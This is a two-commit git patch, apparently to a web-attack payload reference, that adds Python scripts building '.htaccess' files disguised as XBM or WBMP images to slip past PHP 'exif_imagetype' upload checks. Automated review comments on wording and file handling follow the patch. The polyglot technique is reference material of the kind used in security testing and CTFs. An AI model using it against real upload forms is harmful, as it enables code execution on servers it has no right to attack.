From 7877647db13bd1a539847e4dce5ec83a7b80f3ea Mon Sep 17 00:00:00 2001 From: Vladislav Nechakhin Date: Thu, 7 Feb 2019 14:51:03 +0700 Subject: [PATCH 1/2] Update exif_imagetype bypass --- Upload insecure files/PHP .htaccess/README.md | 32 ++++++++++++++++--- 1 file changed, 28 insertions(+), 4 deletions(-) diff --git a/Upload insecure files/PHP .htaccess/README.md b/Upload insecure files/PHP .htaccess/README.md index aa2eaf3..79eff91 100644 --- a/Upload insecure files/PHP .htaccess/README.md +++ b/Upload insecure files/PHP .htaccess/README.md 
@@ -27,16 +27,40 @@ AddType application/x-httpd-php .htaccess # .htaccess upload as image -If on server side for determine the type of an image used exif_imagetype function, try upload .htaccess file like [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) image. +If the exif_imagetype function is used on the server side to determine the image type, create a .htaccess/image polyglot. + +[Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In .htacces ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid .htaccess/image polyglot. ```python -#define test_width 100 -#define test_height 100 +# create valid .htaccess/xbm image -# .htaccess file +width = 50 +height = 50 +payload = '# .htaccess file' + +with open('.htaccess', 'w') as htaccess: + htaccess.write('#define test_width %d\n' % (width, )) + htaccess.write('#define test_height %d\n' % (height, )) + htaccess.write(payload) +``` +or +```python +# create valid .htaccess/wbmp image + +type_header = b'\x00' +fixed_header = b'\x00' +width = b'50' +height = b'50' +payload = b'# .htaccess file' + +with open('.htaccess', 'wb') as htaccess: + htaccess.write(type_header + fixed_header + width + height) + htaccess.write(b'\n') + htaccess.write(payload) ``` ## Thanks to * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html) * [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability) +* [Writeup to l33t-hoster task, Insomnihack Teaser 2019/](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster) From 90db8b0f112c0645320759255fd64ba4b9b67af5 Mon Sep 17 00:00:00 2001 
From: Vladislav Nechakhin Date: Thu, 7 Feb 2019 14:59:22 +0700 Subject: [PATCH 2/2] Update exif_imagetype bypass --- Upload insecure files/PHP .htaccess/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Upload insecure files/PHP .htaccess/README.md b/Upload insecure files/PHP .htaccess/README.md index 79eff91..30b059d 100644 --- a/Upload insecure files/PHP .htaccess/README.md +++ b/Upload insecure files/PHP .htaccess/README.md @@ -27,9 +27,9 @@ AddType application/x-httpd-php .htaccess # .htaccess upload as image -If the exif_imagetype function is used on the server side to determine the image type, create a .htaccess/image polyglot. +If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot. -[Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In .htacces ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid .htaccess/image polyglot. +[Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In `.htaccess` ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid `.htaccess/image` polyglot. ```python # create valid .htaccess/xbm image 
@@ -63,4 +63,4 @@ with open('.htaccess', 'wb') as htaccess: * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html) * [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability) -* [Writeup to l33t-hoster task, Insomnihack Teaser 2019/](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster) +* [Writeup to l33t-hoster task, Insomnihack Teaser 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster)
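Review bot: In PATCH 1/2, hunk `@@ -27,16 +27,40 @@`, both added scripts call `open('.htaccess', ...)` in write mode on a fixed name in the current working directory, so running either one from a directory that already holds a real `.htaccess` silently overwrites it. Take the output path as an argument or write to a scratch file name, and say in the README text where the generated file ends up.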
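Review bot: In PATCH 2/2, hunk `@@ -27,9 +27,9 @@`, the rewritten sentence "In `.htaccess` ignoring lines starting with `\x00` and `#`, you can use these scripts for generate ..." still does not parse: "ignoring" has no subject and "for generate" should be "to generate". Something like "Lines starting with `\x00` or `#` are ignored in `.htaccess`, so these scripts can be used to generate ..." would read cleanly. Putting `.htaccess/image` inside a single code span also makes it look like a file path; mark only `.htaccess` as code and leave "/image polyglot" as plain text.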
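Review bot: In PATCH 2/2, hunk `@@ -63,4 +63,4 @@`, the only change is dropping the stray `/` from the link text `Insomnihack Teaser 2019/` that PATCH 1/2 added, so this fixup belongs squashed into 1/2 instead of landing as a second commit with the identical subject "Update exif_imagetype bypass". While touching the line, the `http://corb3nik.github.io/...` link could use `https://`.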